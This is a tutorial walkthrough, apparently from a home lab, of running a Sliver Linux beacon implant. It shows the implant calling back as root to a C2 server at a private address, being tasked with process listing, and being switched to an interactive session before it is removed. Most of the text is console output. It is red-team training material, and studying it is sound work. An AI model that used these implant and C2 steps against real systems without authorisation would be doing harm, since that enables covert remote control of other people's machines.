Run a Linux Beacon
Deploy the Linux beacon implant to the target host, and run it:
./linbeacon
Once the beacon is running, use the beacons command to see if it has communicated to the Sliver Server. It will not show as "ACTIVE" like the session did, instead using a timer for the next implant communication.
[*] Beacon b0c36448 linbeacon - 192.168.0.133:42986 (kali-nucbox5) - linux/amd64 - Sun, 06 Oct 2024 11:46:12 EDT
sliver > beacons
ID Name Transport Hostname Username Operating System Last Check-In Next Check-In
========== =========== =========== ============== ========== ================== =============== ===============
b0c36448 linbeacon http(s) kali-nucbox5 root linux/amd64 9s 1m0s
sliver >
Next, run the use <ID> command to start interacting with the target host.
sliver > use b0c36448
[*] Active beacon linbeacon (b0c36448-8029-406a-bbe3-3e0cf6972f5a)
sliver (linbeacon) >
As we did before, run the ps command. Notice that there is no immediate output from the command, instead it is setup as a task for the next communication cycle. Using the tasks command will show it as pending.
sliver (linbeacon) > ps
[*] Tasked beacon linbeacon (f1037b58)
sliver (linbeacon) > tasks
ID State Message Type Created Sent Completed
========== ========= ============== =============================== ====== ===========
f1037b58 pending Ps Sun, 06 Oct 2024 11:47:27 EDT
[+] linbeacon completed task f1037b58
Pid Ppid Owner Arch Executable
======= ======= ================== ======== =====================================================================
1 0 root x86_64 /sbin/init
2 0 root kthreadd
3 2 root pool_workqueue_release
Running the tasks fetch command you can select the command to view the output.
sliver (linbeacon) > tasks fetch
+------------------------------------------------------+
| Beacon Task | f1037b58-cfad-4d5a-bf53-41058a1e1802 |
+---------------+--------------------------------------+
| State | ✅ Completed |
| Description | PsReq |
| Created | Sun, 06 Oct 2024 11:47:27 EDT |
| Sent | Sun, 06 Oct 2024 11:47:35 EDT |
| Completed | Sun, 06 Oct 2024 11:47:35 EDT |
| Request Size | 15 B |
| Response Size | 10.4 KiB |
+------------------------------------------------------+
Pid Ppid Owner Arch Executable ~~
======= ======= ================== ======== ====================================================================================~~
1 0 root x86_64 /sbin/init splash ~~
2 0 root kthreadd ~~
3 2 root pool_workqueue_release ~~
Again, you can get the information of the current implant by simply running the info command:
sliver (linbeacon) > info
Beacon ID: b0c36448-8029-406a-bbe3-3e0cf6972f5a
Name: linbeacon
Hostname: kali-nucbox5
UUID: 010987dd-f33d-4be8-b236-fb83f884c62e
Username: root
UID: 0
GID: 0
PID: 28632
OS: linux
Version: Linux kali-nucbox5 6.10.12-amd64
Locale: en-US
Arch: amd64
Active C2: https://192.168.0.120
Remote Address: 192.168.0.133:42986
Proxy URL:
Interval: 1m0s
Jitter: 30s
First Contact: Sun Oct 6 11:46:12 EDT 2024 (3m11s ago)
Last Checkin: Sun Oct 6 11:49:04 EDT 2024 (19s ago)
Next Checkin: Sun Oct 6 11:50:10 EDT 2024 (in 47s)
sliver (linbeacon) >
If you have a beacon running on the target host, you can switch the beacon to a session, by executing the interactive command. However, you cannot switch a session to a beacon.
Take a look at the current environment, and then switch to session mode:
sliver (linbeacon) > beacons
ID Name Transport Hostname Username Operating System Last Check-In Next Check-In
========== =========== =========== ============== ========== ================== =============== ===============
b0c36448 linbeacon http(s) kali-nucbox5 root linux/amd64 1m9s 3s
sliver (linbeacon) > sessions
[*] No sessions 🙁
sliver (linbeacon) >
Keep in mind that the command is run in beacon mode, so it will be tasked until the next scheduled communication. Once it finishes, you will see that a new session has started.
[sliver (linbeacon) > interactive
[*] Using beacon's active C2 endpoint: https://192.168.0.120
[*] Tasked beacon linbeacon (34028a04)
sliver (linbeacon) >
Once the beacon checks in, it will then run the interactive command:
[*] Session d7e28579 linbeacon - 192.168.0.133:39508 (kali-nucbox5) - linux/amd64 - Sun, 06 Oct 2024 11:51:29 EDT
sliver (linbeacon) > sessions
ID Transport Remote Address Hostname Username Operating System Health
========== =========== ===================== ============== ========== ================== =========
d7e28579 http(s) 192.168.0.133:39508 kali-nucbox5 root linux/amd64 [ALIVE]
sliver (linbeacon) > use d7e28579
[*] Active session linbeacon (d7e28579-2e24-4988-ac9b-950a20bdbc3f)
sliver (linbeacon) >
To close an interactive session without killing the remote process, run the close command.
sliver (linbeacon) > close
[!] Lost session d7e28579 linbeacon - 192.168.0.133:39508 (kali-nucbox5) - linux/amd64 - Sun, 06 Oct 2024 11:53:53 EDT
[!] Active session disconnected
sliver >
Once your use of the implant is finished, you can kill the process on the target host, or you can just kill the beacon in Sliver. Keep in mind that the executable will still be on the target host. Since the beacon is not in use, we can just remove it.
sliver > beacons rm
? Select a beacon: [Use arrows to move, type to filter]
> b0c36448-8029-406a-bbe3-3e0cf6972f5a linbeacon 192.168.0.133:42986 kali-nucbox5 root linux/amd64
[*] Beacon removed (b0c36448-8029-406a-bbe3-3e0cf6972f5a)
sliver >
Kill the beacon off, and ensure that no sessions or beacons are running on the target host.